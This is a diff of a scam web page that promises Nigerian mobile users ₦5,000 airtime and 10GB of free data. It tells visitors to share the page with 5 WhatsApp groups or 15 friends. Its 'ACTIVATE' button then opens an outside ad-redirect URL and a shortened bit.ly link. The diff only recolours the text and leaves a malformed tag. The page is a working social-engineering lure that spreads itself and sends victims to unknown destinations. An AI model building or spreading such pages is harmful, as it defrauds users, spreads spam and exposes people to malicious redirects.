--- a/davido.html
+++ b/davido.html
@@ -142,11 +142,11 @@
         </div>
         <div id="share">
 
-          <p class="tip"> <font color="#000000">Congratulations, your Mobile Number</font> <span id="getname"></span>،</p>
+          <p class="tip"> <font color="#ffffff">Congratulations, your Mobile Number</font> <span id="getname"></span>،</p>
             <p class="tip">
-              <font color="#000000"> is Eligible to receive ₦5,000 airtime and 10GB Free Data Christmas and new year celebration offer</font><span class="amount"> Proceed to Activate your Free Data and Airtime </span><br>
-              <font color="#000000">How to proceed:</font>
-            </p><br><font color="#000000">
+              <font color="#ffffff"> is Eligible to receive ₦5,000 airtime and 10GB Free Data Christmas and new year celebration offer</font><span class="amount"> <font color="yellow">Proceed to Activate your Free Data and Airtime</font>font> </span><br>
+              <font color="#ffffff">How to proceed:</font>
+            </p><br><font color="#ffffff">
             <p class="tip">1. Share it with 5 groups or 15 friends on WhatsApp (Click on the "SHARE" icon below).</p>
             <p class="tip">2. You will be redirected automatically to our "ACTIVATION" page after the verification bar is filled.</p>
           </font>
@@ -173,7 +173,7 @@
         </div>
         <div id="claim">
             <p class="done"><i class="fa fa-check-circle fa-3x" aria-hidden="true"></i></p>
-            <p class="title"> <font color="#E39A06">Click "ACTIVATE" Below to activate your data and Airtime </font> </p>
+            <p class="title"> <font color="#ffffff">Click "ACTIVATE" Below to activate your data and Airtime </font> </p>
            <br/>
           <a  onclick="window.open('http://outrotomr.com/4/3144603')" href="https://bit.ly/484ShaB" >
                     <button style="display: flex;align-items: center;justify-content: center;margin: 0;width: 100%;" class="btn btn-primary"><font color="yellow"><div width="300"
